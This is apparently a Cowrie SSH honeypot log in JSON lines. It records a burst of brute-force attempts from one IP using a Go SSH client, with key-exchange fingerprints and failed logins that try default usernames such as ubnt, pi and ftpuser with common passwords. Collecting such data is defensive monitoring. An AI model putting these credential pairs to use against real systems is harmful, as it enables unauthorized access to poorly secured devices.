{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.326918Z","src_ip":"87.120.191.13","session":"f6a4e078d28b"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"12345678","message":"login attempt [ubnt/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.649338Z","src_ip":"87.120.191.13","session":"1317d1c82f1b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.657787Z","src_ip":"87.120.191.13","session":"0efc7fd59f5e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.664633Z","src_ip":"87.120.191.13","session":"5a657ec83eb4"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.684139Z","src_ip":"87.120.191.13","session":"d91570ca29a8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35638,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef7e6a4821a0","protocol":"ssh","message":"New connection: 87.120.191.13:35638 (1.2.3.4:22) [session: ef7e6a4821a0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.687427Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.694614Z","src_ip":"87.120.191.13","session":"5d067370b5a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.767919Z","src_ip":"87.120.191.13","session":"ef7e6a4821a0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.773942Z","src_ip":"87.120.191.13","session":"ef7e6a4821a0"}
{"eventid":"cowrie.login.failed","username":"noc","password":"12345678","message":"login attempt [noc/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:42.932083Z","src_ip":"87.120.191.13","session":"f6a4e078d28b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.139213Z","src_ip":"87.120.191.13","session":"bd28c39a6d75"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35646,"dst_ip":"1.2.3.4","dst_port":22,"session":"84dadb6434aa","protocol":"ssh","message":"New connection: 87.120.191.13:35646 (1.2.3.4:22) [session: 84dadb6434aa]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.158297Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.705304Z","src_ip":"87.120.191.13","session":"0efc7fd59f5e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.745438Z","src_ip":"87.120.191.13","session":"1317d1c82f1b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39224,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b0813f99c3a","protocol":"ssh","message":"New connection: 87.120.191.13:39224 (1.2.3.4:22) [session: 7b0813f99c3a]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.747835Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39230,"dst_ip":"1.2.3.4","dst_port":22,"session":"5206fa62785b","protocol":"ssh","message":"New connection: 87.120.191.13:39230 (1.2.3.4:22) [session: 5206fa62785b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.748863Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39238,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35c5900b667","protocol":"ssh","message":"New connection: 87.120.191.13:39238 (1.2.3.4:22) [session: d35c5900b667]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.771726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.775732Z","src_ip":"87.120.191.13","session":"5206fa62785b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.776280Z","src_ip":"87.120.191.13","session":"5206fa62785b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.779784Z","src_ip":"87.120.191.13","session":"7b0813f99c3a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.780485Z","src_ip":"87.120.191.13","session":"7b0813f99c3a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.784583Z","src_ip":"87.120.191.13","session":"5d067370b5a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.801810Z","src_ip":"87.120.191.13","session":"d35c5900b667"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.802519Z","src_ip":"87.120.191.13","session":"d35c5900b667"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39240,"dst_ip":"1.2.3.4","dst_port":22,"session":"edd9e5410dfd","protocol":"ssh","message":"New connection: 87.120.191.13:39240 (1.2.3.4:22) [session: edd9e5410dfd]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.819066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.863497Z","src_ip":"87.120.191.13","session":"edd9e5410dfd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.864207Z","src_ip":"87.120.191.13","session":"edd9e5410dfd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.959051Z","src_ip":"87.120.191.13","session":"d91570ca29a8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.962451Z","src_ip":"87.120.191.13","session":"f6a4e078d28b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.969912Z","src_ip":"87.120.191.13","session":"5206fa62785b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.977040Z","src_ip":"87.120.191.13","session":"7b0813f99c3a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39248,"dst_ip":"1.2.3.4","dst_port":22,"session":"a77e4b55a7b1","protocol":"ssh","message":"New connection: 87.120.191.13:39248 (1.2.3.4:22) [session: a77e4b55a7b1]","sensor":"my-vps","timestamp":"2025-08-26T13:58:43.981552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:44.024096Z","src_ip":"87.120.191.13","session":"a77e4b55a7b1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:44.024817Z","src_ip":"87.120.191.13","session":"a77e4b55a7b1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:44.072477Z","src_ip":"87.120.191.13","session":"edd9e5410dfd"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:44.124494Z","src_ip":"87.120.191.13","session":"d35c5900b667"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:44.987413Z","src_ip":"87.120.191.13","session":"a77e4b55a7b1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.298355Z","src_ip":"87.120.191.13","session":"5206fa62785b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.321754Z","src_ip":"87.120.191.13","session":"7b0813f99c3a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.328376Z","src_ip":"87.120.191.13","session":"d35c5900b667"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.332642Z","src_ip":"87.120.191.13","session":"edd9e5410dfd"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39290,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc2f7f6e044a","protocol":"ssh","message":"New connection: 87.120.191.13:39290 (1.2.3.4:22) [session: cc2f7f6e044a]","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.347762Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39296,"dst_ip":"1.2.3.4","dst_port":22,"session":"295e248cc488","protocol":"ssh","message":"New connection: 87.120.191.13:39296 (1.2.3.4:22) [session: 295e248cc488]","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.358329Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39308,"dst_ip":"1.2.3.4","dst_port":22,"session":"a391201fdb38","protocol":"ssh","message":"New connection: 87.120.191.13:39308 (1.2.3.4:22) [session: a391201fdb38]","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.365281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.411603Z","src_ip":"87.120.191.13","session":"295e248cc488"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.413040Z","src_ip":"87.120.191.13","session":"295e248cc488"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.424379Z","src_ip":"87.120.191.13","session":"cc2f7f6e044a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.424916Z","src_ip":"87.120.191.13","session":"cc2f7f6e044a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.436907Z","src_ip":"87.120.191.13","session":"a391201fdb38"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.437592Z","src_ip":"87.120.191.13","session":"a391201fdb38"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"p@ssw0rd","message":"login attempt [ubnt/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.645806Z","src_ip":"87.120.191.13","session":"cc2f7f6e044a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.675772Z","src_ip":"87.120.191.13","session":"295e248cc488"}
